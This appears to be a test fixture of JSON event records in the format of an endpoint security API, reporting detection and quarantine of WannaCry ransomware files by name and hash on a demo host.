+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
